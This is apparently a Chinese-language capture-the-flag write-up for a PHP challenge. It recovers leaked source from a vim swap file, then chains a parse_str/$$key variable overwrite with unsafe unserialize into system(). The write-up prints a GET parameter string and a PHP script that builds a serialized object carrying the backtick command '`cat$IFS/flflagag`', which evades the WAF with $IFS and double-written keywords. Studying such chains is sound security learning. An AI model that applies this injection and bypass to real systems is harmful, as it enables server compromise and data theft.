web2
扫描发现源码泄露:.index.php.swp
用vi恢复一下
<?php
class come{
private $method;
private $args;
function __construct($method, $args) {
$this->method = $method;
$this->args = $args;
}
function __wakeup(){
foreach($this->args as $k => $v) {
$this->args[$k] = $this->waf(trim($v));
}
}
function waf($str){
$str=preg_replace("/[<>*;|?\n ]/","",$str);
$str=str_replace('flag','',$str);
return $str;
}
function echo($host){
system("echo $host");
}
function __destruct(){
if (in_array($this->method, array("echo"))) {
call_user_func_array(array($this, $this->method), $this->args);
}
}
}
$first='hi';
$var='var';
$bbb='bbb';
$ccc='ccc';
$i=1;
foreach($_GET as $key => $value) {
if($i===1)
{
$i++;
$$key = $value;
}
else{break;}
}
if($first==="doller")
{
@parse_str($_GET['a']);
if($var==="give")
{
if($bbb==="me")
{
if($ccc==="flag")
{
echo "<br>welcome!<br>";
$come=@$_POST['come'];
unserialize($come);
}
}
else
{echo "<br>think about it<br>";}
}
else
{
echo "NO";
}
}
else
{
echo "Can you hack me?<br>";
}
?>
简单分析一下源码:
利用prase_str()的变量覆盖
传递参数first=doller&a=var%3dgive%26bbb%3dme%26ccc%3dflag
直接进入到下一步反序列化,这里只需把=、&编码一下即可同时覆盖多个变量。
come这里是典型的反序列化,只需绕过一下waf执行命令。
通过反引号可以直接执行命令,
空格用$IFS代替,
waf里面flag只是做了一次替换为空、双写绕过,
并在属性的前面加上%00才能成功反序列化
<?php
error_reporting(0);
class come{
private $method;
private $args;
function __construct($method, $args) {
$this->method = $method;
$this->args = $args;
}
function __wakeup(){
foreach($this->args as $k => $v) {
$this->args[$k] = $this->waf(trim($v));
}
}
function waf($str){
$str=preg_replace("/[<>*;|?\n ]/","",$str);
$str=str_replace('flag','',$str);
return $str;
}
#function echo($host){
# system("echo $host");
#}
function __destruct(){
if (in_array($this->method, array("echo"))) {
call_user_func_array(array($this, $this->method), $this->args);
}
}
}
$test = new come("echo",array('`cat$IFS/flflagag`'));
echo serialize($test);
?>
最终payload:
图片.png
参考文章:http://www.cnblogs.com/nul1/p/9502333.html
网友评论